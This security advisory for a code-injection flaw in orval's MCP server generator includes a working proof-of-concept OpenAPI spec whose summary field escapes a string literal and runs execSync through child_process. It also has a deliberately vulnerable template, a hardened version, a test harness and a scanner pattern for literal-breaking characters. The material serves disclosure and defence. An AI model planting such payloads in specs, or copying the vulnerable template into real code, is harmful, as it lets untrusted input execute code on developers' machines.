
CVE-2026-22785 / GHSA-mwr6-3gp8-9jmj

orval MCP client is vulnerable to a code injection attack.

Impact

The MCP server generator builds its output by string concatenation and interpolates the `summary` field of each OpenAPI operation into a string literal without validation or escaping. A summary containing a quote character therefore terminates the literal, and everything after it is emitted as code in the generated file, so an attacker who controls the OpenAPI document (for example a third-party or tampered specification) can "break out" of the string literal and inject arbitrary code that runs when the generated server is loaded.

Here is an example OpenAPI document carrying the exploit; the payload sits in the `summary` of the `/pet/findByStatus` operation:

```yaml
openapi: 3.0.4
info:
  title: Swagger Petstore - OpenAPI 3.0
  description: |-
    This is a sample Pet Store Server based on the OpenAPI 3.0 specification.  You can find out more about
    Swagger at https://swagger.io. In the third iteration of the pet store, we've switched to the design first approach!
    You can now help us improve the API whether it's by making changes to the definition itself or to the code.
    That way, with time, we can improve the API in general, and expose some of the new features in OAS3.
    Some useful links:
  termsOfService: https://swagger.io/terms/
  contact:
    email: apiteam@swagger.io
  license:
    name: Apache 2.0
    url: https://www.apache.org/licenses/LICENSE-2.0.html
  version: 1.0.27-SNAPSHOT
externalDocs:
  description: Find out more about Swagger
  url: https://swagger.io
servers:
  - url: https://petstore3.swagger.io/api/v3
tags:
  - name: pet
    description: Everything about your Pets
    externalDocs:
      description: Find out more
      url: https://swagger.io
  - name: store
    description: Access to Petstore orders
    externalDocs:
      description: Find out more about our store
      url: https://swagger.io
  - name: user
    description: Operations about user
paths:
  /pet/findByStatus:
    get:
      tags:
        - pet
      # Injected payload: the quote closes the generated string literal, the
      # rest is emitted as code, and `//` comments out the template's remainder.
      summary: Finds Pets by status.' + require('child_process').execSync("open -a Calculator").toString(),//
      description: Multiple status values can be provided with comma separated strings.
      operationId: findPetsByStatus
      parameters:
        - name: status
          in: query
          description: Status values that need to be considered for filter
          schema:
            type: string
      responses:
        '200':
          description: successful operation
          content:
            application/json:
              schema:
                type: string
        '400':
          description: Invalid status value
        default:
          description: Unexpected error
      security:
        - petstore_auth:
            - write:pets
            - read:pets
```
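To make the break-out concrete, the following JavaScript is an added illustration and not orval's generator or the upstream fix: a deliberately vulnerable template that splices `summary` into a single-quoted literal, the same template with the value encoded via `JSON.stringify`, and a small harness that evaluates the generated snippet with a stub `require` so the reader can see which version actually reaches `child_process` without running a real command. The template shape, the function names and the stub are assumptions; the payload is the one from the advisory's example spec.

```javascript
// Added illustration (not orval's code): why an unescaped OpenAPI `summary`
// becomes executable code, and how a proper string-literal encoding stops it.
// Template shape, function names and the stub `require` are assumptions.

// Payload taken from the advisory's example spec, and a benign summary.
const MALICIOUS_SUMMARY =
  "Finds Pets by status.' + require('child_process').execSync(\"open -a Calculator\").toString(),//";
const BENIGN_SUMMARY = "Finds Pets by status.";

// Vulnerable template: the summary is spliced into a single-quoted literal.
// A summary containing `'` closes the literal and the rest is emitted as code.
function renderToolVulnerable(operationId, summary) {
  return (
    "({\n" +
    "  name: '" + operationId + "',\n" +
    "  description: '" + summary + "',\n" +
    "})"
  );
}

// Hardened template: JSON.stringify emits a double-quoted literal with quotes,
// backslashes and control characters escaped, so the value stays data.
// (Every JSON string is a valid JS string literal; ES2019 made U+2028/U+2029
// legal inside literals, which closed the last gap.)
function renderToolSafe(operationId, summary) {
  return (
    "({\n" +
    "  name: " + JSON.stringify(operationId) + ",\n" +
    "  description: " + JSON.stringify(summary) + ",\n" +
    "})"
  );
}

// Evaluate a generated snippet with a stub `require` that only records what
// was requested. If the payload escaped the literal, the stub is called; if
// it was properly escaped, the call never happens and the summary is just text.
function evaluateGenerated(source) {
  const loaded = [];
  const stubRequire = (name) => {
    loaded.push(name);
    return { execSync: () => "" }; // never runs a real command
  };
  const tool = new Function("require", "return " + source)(stubRequire);
  return { tool, loaded };
}

// Did rendering `summary` with the given template cause a module load?
// renderToolVulnerable + MALICIOUS_SUMMARY -> true; renderToolSafe -> false.
function triggersModuleLoad(render, summary) {
  return evaluateGenerated(render("findPetsByStatus", summary)).loaded.length > 0;
}
```

The point of the harness is that the vulnerable template yields `description: 'Finds Pets by status.' + require('child_process')...` as live code, while the hardened one yields a single string whose value is the payload text itself. Any generator that emits source from untrusted fields needs the same discipline for every interpolated value, not just `summary`.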

  

Patches

This is fixed in version 7.18.0 or higher (and in 8.0.0-rc.6 for the 8.x prereleases).

Workarounds

Before running a specification through the Orval CLI, inspect the OpenAPI YAML/JSON, in particular string fields such as `summary`, for quote characters or code fragments, and correct or reject any document that contains them. Treat specifications fetched from remote or third-party sources as untrusted input.
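One way to automate that pre-flight check, as an added example that is not orval's own tooling: walk every operation of an already-parsed OpenAPI object and report any `summary` containing a character that can close or escape a JavaScript string literal. The function names, the field list and the sample spec object are constructed for illustration; parse your YAML/JSON with whatever loader you already use and pass the resulting object in.

```javascript
// Added example (not orval's code): pre-flight scan of an OpenAPI document
// for summary values that could break out of a generated string literal.
// Function names, FIELDS and SAMPLE_SPEC are constructed for illustration.

// Characters that terminate or escape a single- or double-quoted JS literal,
// a raw newline (ends an unterminated literal) and the template-literal opener.
const BREAKOUT_PATTERN = /['"`\\\n\r]|\$\{/;

const HTTP_METHODS = ["get", "put", "post", "delete", "options", "head", "patch", "trace"];

// The advisory names `summary` as the interpolated field. Extend this list if
// your generator splices other operation fields into code. `description` is
// deliberately left out: free text routinely contains apostrophes, so it
// would drown the report in noise.
const FIELDS = ["summary"];

// Return one finding per operation field whose value could break a literal.
function findRiskyOperations(spec) {
  const findings = [];
  const paths = (spec && spec.paths) || {};
  for (const [route, item] of Object.entries(paths)) {
    for (const method of HTTP_METHODS) {
      const op = item[method];
      if (!op) continue;
      for (const field of FIELDS) {
        const value = op[field];
        if (typeof value === "string" && BREAKOUT_PATTERN.test(value)) {
          findings.push({ route, method, field, value });
        }
      }
    }
  }
  return findings;
}

// Gate for a CI step: ok === false means "do not run the generator".
function checkSpec(spec) {
  const findings = findRiskyOperations(spec);
  return { ok: findings.length === 0, findings };
}

// Human-readable report, one line per finding.
function formatReport(findings) {
  return findings
    .map((f) => `${f.method.toUpperCase()} ${f.route}: ${f.field} contains a literal-breaking character`)
    .join("\n");
}

// Constructed spec: the advisory's payload on one operation, a benign one beside it.
const SAMPLE_SPEC = {
  openapi: "3.0.4",
  paths: {
    "/pet/findByStatus": {
      get: {
        operationId: "findPetsByStatus",
        summary: "Finds Pets by status.' + require('child_process').execSync(\"open -a Calculator\").toString(),//",
      },
    },
    "/pet/{petId}": {
      get: { operationId: "getPetById", summary: "Find pet by ID." },
    },
  },
};
```

The check is intentionally conservative: a harmless apostrophe in a summary ("Pet's details") is flagged too, because the generator cannot tell it apart from the payload above. That is the right trade-off for a gate that runs before code generation; a flagged summary costs a quick manual look, a missed one costs code execution.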


CVSS

| CVSS Version | Severity | Base Score | Score Vector |
|---|---|---|---|
| 4.0 | Critical | 9.3 | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| 3.1 | Critical | 9.8 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |


References

https://github.com/orval-labs/orval/security/advisories/GHSA-mwr6-3gp8-9jmj
https://nvd.nist.gov/vuln/detail/CVE-2026-22785
https://github.com/orval-labs/orval/commit/80b5fe73b94f120a3a5561952d6d4b0f8d7e928d
https://github.com/orval-labs/orval


Basic Information

Base CVSS: 9.8
EPSS Probability: 0.00047%
EPSS Percentile: 0.14702%
Introduced Version: 0, 7.9.0, 8.0.0-rc.0
Fix Available: 7.18.0, 8.0.0-rc.6
